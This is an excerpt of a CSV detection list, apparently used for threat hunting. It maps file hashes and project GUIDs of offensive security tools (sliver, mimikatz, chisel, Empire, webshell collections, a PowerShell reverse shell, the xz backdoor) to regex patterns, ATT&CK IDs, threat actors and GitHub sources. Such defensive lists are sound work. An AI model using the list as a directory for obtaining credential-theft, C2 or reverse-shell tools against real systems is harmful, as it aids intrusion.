"*c8136e16bcb8f48bfe975afa4a490f47c6ea96063380cbed21a95ac1c1f73dcc*",".{0,1000}c8136e16bcb8f48bfe975afa4a490f47c6ea96063380cbed21a95ac1c1f73dcc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37265"
"*c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67*",".{0,1000}c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","37267"
"*c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb*",".{0,1000}c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37268"
"*C82E994585B5C08F7259B00BD5F91AD45FCC8E42B4BF6A3CA989278D0A63BACF*",".{0,1000}C82E994585B5C08F7259B00BD5F91AD45FCC8E42B4BF6A3CA989278D0A63BACF.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","37269"
"*c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14*",".{0,1000}c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37271"
"*c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63*",".{0,1000}c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37273"
"*C8482002-F594-4C28-9C46-960B036540A8*",".{0,1000}C8482002\-F594\-4C28\-9C46\-960B036540A8.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/openbullet/OpenBullet2","1","0","#GUIDproject","N/A","10","10","1953","518","2025-03-16T10:50:26Z","2020-04-23T14:04:16Z","37274"
"*c84f6dc3572924ef262bdef54962e03099ca54cab7f27cf1b9112b00c4ff95e9*",".{0,1000}c84f6dc3572924ef262bdef54962e03099ca54cab7f27cf1b9112b00c4ff95e9.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37275"
"*c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b*",".{0,1000}c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#filehash","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","37276"
"*c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e*",".{0,1000}c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","37277"
"*c85c649826d3f0cb619861663dbc70669e6705eec03ddb383fc9ef92125aaf25*",".{0,1000}c85c649826d3f0cb619861663dbc70669e6705eec03ddb383fc9ef92125aaf25.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","37278"
"*c861d54834fecee5b581950037912e302f14fb706c732929d7cf3e5a954fdbe1*",".{0,1000}c861d54834fecee5b581950037912e302f14fb706c732929d7cf3e5a954fdbe1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","37281"
"*c862cc7e0faabfff2c8e8e58cf7fca200ae534aa5f58857331d1377187a19d3a*",".{0,1000}c862cc7e0faabfff2c8e8e58cf7fca200ae534aa5f58857331d1377187a19d3a.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","37282"
"*c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9*",".{0,1000}c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37283"
"*c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498*",".{0,1000}c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","37284"
"*c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128*",".{0,1000}c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37285"
"*c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128*",".{0,1000}c86c8e44048907b077f48cfb1d2de1eee216ff699e3a6ce240b6d107b7a6f128.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","37286"
"*c86c8f8a69c07fbec8dd650c6604bf0c9876261f*",".{0,1000}c86c8f8a69c07fbec8dd650c6604bf0c9876261f.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","37287"
"*c86e8448571c6b7ad352c67c4b68bdca5cfb1bcab713eba5d8f3eaa4b3e90ba1*",".{0,1000}c86e8448571c6b7ad352c67c4b68bdca5cfb1bcab713eba5d8f3eaa4b3e90ba1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37289"
"*c871b8811cc20f85aa417f598bd55d43d7ebac611c238c364c8ab41953efe321*",".{0,1000}c871b8811cc20f85aa417f598bd55d43d7ebac611c238c364c8ab41953efe321.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","37290"
"*c876220ab3ebb8d45afeb7dfc23ca6a0eff57a1e323533352c089768a6c487b6*",".{0,1000}c876220ab3ebb8d45afeb7dfc23ca6a0eff57a1e323533352c089768a6c487b6.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","37291"
"*c87966a280098a45c90dac27666f3f01f6b6999e7b08719a8035f1355d696ad4*",".{0,1000}c87966a280098a45c90dac27666f3f01f6b6999e7b08719a8035f1355d696ad4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37292"
"*c87b427a81ef1bd26dae10308f7e4b81e1c27a535aa17da16270c458efe51d77*",".{0,1000}c87b427a81ef1bd26dae10308f7e4b81e1c27a535aa17da16270c458efe51d77.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37293"
"*c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9*",".{0,1000}c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37294"
"*c8808822c7f2fb60db3809d0700f739e39dca8c3d4918d01daa696ef8ed6a819*",".{0,1000}c8808822c7f2fb60db3809d0700f739e39dca8c3d4918d01daa696ef8ed6a819.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","37297"
"*c88583cefd0d79a7db5a22290081218d5d9e2ce83de1ca17b8242f7fc74b2535*",".{0,1000}c88583cefd0d79a7db5a22290081218d5d9e2ce83de1ca17b8242f7fc74b2535.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#filehash","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","37299"
"*c887fef4396ca2a13d0696810b2ddceb2e825ac75e9a4ec0bbb9dcbd3f7d8f5c*",".{0,1000}c887fef4396ca2a13d0696810b2ddceb2e825ac75e9a4ec0bbb9dcbd3f7d8f5c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37301"
"*C88D7583-254F-4BE6-A9B9-89A5BB52E679*",".{0,1000}C88D7583\-254F\-4BE6\-A9B9\-89A5BB52E679.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#GUIDproject #linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","37303"
"*c88d86aee55b31827ab4782d05bd44922276955909c43c69f0fb15377cc64374*",".{0,1000}c88d86aee55b31827ab4782d05bd44922276955909c43c69f0fb15377cc64374.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37304"
"*c89b7fe9c1dc0d1ad5aafcac7cdadc593bfa70c267e365a2b02df479c1ec9a0c*",".{0,1000}c89b7fe9c1dc0d1ad5aafcac7cdadc593bfa70c267e365a2b02df479c1ec9a0c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37306"
"*c89d8852d0a35fe9bf532fa3da805f715527e3e38065db0cf5da7f993531f87f*",".{0,1000}c89d8852d0a35fe9bf532fa3da805f715527e3e38065db0cf5da7f993531f87f.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37307"
"*c8a9514b7960c16693f6f8d9ff70fb81aee3a0d152e502782337f7dc2cd9a64b*",".{0,1000}c8a9514b7960c16693f6f8d9ff70fb81aee3a0d152e502782337f7dc2cd9a64b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37310"
"*c8ae4bec1bf8a1f63364441f766287ead235ef96c84895a62e07d9a9e7f8e6a7*",".{0,1000}c8ae4bec1bf8a1f63364441f766287ead235ef96c84895a62e07d9a9e7f8e6a7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37311"
"*c8b7754a7e593daafe1fc7804731fca139ace13fdcf3842ceada5d97f0a358cf*",".{0,1000}c8b7754a7e593daafe1fc7804731fca139ace13fdcf3842ceada5d97f0a358cf.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37312"
"*c8bbde78c6ad9fb5501ca1967e813836496498e0592e7ca77f7d6f9c43ef96ca*",".{0,1000}c8bbde78c6ad9fb5501ca1967e813836496498e0592e7ca77f7d6f9c43ef96ca.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","37313"
"*c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617*",".{0,1000}c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37314"
"*c8c03eac6f580d5a5b06e41e3893f9addc08b3ffce06772fe997df705af91cbf*",".{0,1000}c8c03eac6f580d5a5b06e41e3893f9addc08b3ffce06772fe997df705af91cbf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37315"
"*C8C12FA3-717F-4D35-B8B3-2E7F7A124E7C*",".{0,1000}C8C12FA3\-717F\-4D35\-B8B3\-2E7F7A124E7C.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","37316"
"*c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219*",".{0,1000}c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37317"
"*c8c9275b-4f46-4d48-9096-f0ec2e4ac8eb*",".{0,1000}c8c9275b\-4f46\-4d48\-9096\-f0ec2e4ac8eb.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#GUIDproject","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","37318"
"*C8D738E6-8C30-4715-8AE5-6A8FBFE770A7*",".{0,1000}C8D738E6\-8C30\-4715\-8AE5\-6A8FBFE770A7.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","#GUIDproject","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","37321"
"*c8da2ec07d898ec888a807d390929697de0e87dccd27516dc190b37c64cb9bbe*",".{0,1000}c8da2ec07d898ec888a807d390929697de0e87dccd27516dc190b37c64cb9bbe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37322"
"*c8dcd4f55989ca974ccbf330b883606943b4cddd96049618d4f9b52bd84a444b*",".{0,1000}c8dcd4f55989ca974ccbf330b883606943b4cddd96049618d4f9b52bd84a444b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37324"
"*c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090*",".{0,1000}c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37325"
"*c8f180ed07a027942370c5946ad38e71f4afc3a1cd10295b415606678d9832b2*",".{0,1000}c8f180ed07a027942370c5946ad38e71f4afc3a1cd10295b415606678d9832b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37326"
